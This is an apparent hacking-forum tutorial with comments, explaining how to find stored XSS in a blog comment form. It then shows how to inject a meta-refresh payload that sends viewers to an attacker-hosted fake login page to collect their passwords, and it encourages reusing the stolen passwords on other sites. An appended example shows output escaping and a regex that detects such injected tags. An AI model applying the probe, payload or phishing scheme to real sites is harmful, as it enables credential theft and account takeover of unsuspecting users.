
XSS Attacks and Phishing


By ghostghost | 5717 Reads |

Ok, a lot of you know what XSS is but some of you don't. It's basically the injection of HTML/Javascript etc. into a form or input area. I recently used XSS in the interesting way I will present below on a blog site.

Ok, so you arrive on a site, you wanna be able to find out if it's vulnerable to XSS without being too suspicious. Obviously if you type <script> javascript:alert (/owned/)</script> in and it turns out not to work, you're gonna be conspicuous and probably end up getting banned from the site (which you may or may not care about). Anyhow, so you come to a form, this can be a Shoutbox, Chat area, Comment Form, Registration Page, Login, etc. In this example, I'll use the comment form to a blog, since that's what I did on the blog site I recently encountered. (Of course I was nice enough to report it, but only after getting a couple passes and havin some fun.)

So try injecting <i>Hey</i> first, then if it doesn't go through, they might just think you were tryin to italicize your words, just for kicks. If it goes through and in the comment area you see the words are italicized and no tags, then presto, XSS VULNERABLE!! Okay, so now you can go ahead and do the skiddish way of XSS injection and put in your javascript alert. Ooor you could set up a redirection to a Fake Login or Phishing page you set up etc. Ok, so first you go and make your fake login page on whatever host. And of course, make it look EXACTLY like the login for the BlogSite.

<head>
<meta http-equiv="Refresh" content="0;URL=http://www.myphishinpage.com/login.php">
</head>
</html>

So now every time someone views the injected blog, they'll be redirected to your fake login, then leading to them using it (thinking, oops, got logged out somehow) then giving you their login info. And if you know other sites those people go on, you can probably use the login on those too. See, a majority of people use the same password at least, on every site they go to, I confess, I do on most sites. Soo anyway you get my point, this is a much more effective (in my opinion) method to using XSS injections. YOU can be SKIDDISH and put a oh so terrifying javascript alert. Orrrr you can get some good ol' passes. Your choice, guess that's it, love ya HBH'ers. PEACE. B)
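Added example, not part of the original article or of any site it mentions: both the <i>Hey</i> probe and the meta refresh only work because the comment body is echoed into the page as markup. The sketch below puts a vulnerable renderer beside an output-encoding one and adds an audit pass over comments already stored; every function name, the sample comments and the example.invalid URL are constructed for illustration.

```javascript
// Hypothetical comment renderer for a blog (added example, names are assumptions).

// Characters that let user text break out of an HTML text context.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable: user input is concatenated into the page as markup.
function renderCommentUnsafe(author, body) {
  return '<div class="comment"><b>' + author + '</b>: ' + body + '</div>';
}

// Hardened: every user-controlled value is encoded before it reaches the page.
function renderCommentSafe(author, body) {
  return '<div class="comment"><b>' + escapeHtml(author) + '</b>: ' + escapeHtml(body) + '</div>';
}

// Audit pass for comments stored before the fix: flag bodies carrying tags
// that can navigate the viewer away or run script (meta refresh, script,
// iframe, inline event handlers). Plain formatting tags are not flagged.
const ACTIVE_MARKUP =
  /<\s*(meta\b[^>]*http-equiv\s*=\s*["']?refresh|script\b|iframe\b|[a-z][^>]*\son\w+\s*=)/i;

function auditStoredComments(comments) {
  return comments.filter((c) => ACTIVE_MARKUP.test(c.body)).map((c) => c.id);
}

// Constructed sample data mirroring the two inputs the article describes.
const SAMPLE_COMMENTS = [
  { id: 1, author: 'alice', body: 'Nice post, thanks!' },
  { id: 2, author: 'bob', body: '<i>Hey</i>' },
  { id: 3, author: 'eve', body: '<meta http-equiv="Refresh" content="0;URL=http://login.example.invalid/">' },
];

for (const c of SAMPLE_COMMENTS) {
  console.log(renderCommentSafe(c.author, c.body));
}
console.log('comments needing review:', auditStoredComments(SAMPLE_COMMENTS));
```

With the encoding renderer the probe shows up as literal text with its tags visible, and the refresh tag is displayed instead of being acted on by the browser.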

Comments
ghost 17 years ago

Sorry, not as good as I had hoped. Ahh well... I was tired and lazy when I wrote this, not my best.

ghost 17 years ago

Meh... it works. And you can always edit it.

ghost 17 years ago

Yeah, I did edit a little... it's fine for now, I might add some more later.

ghost 17 years ago

I liked this a lot =]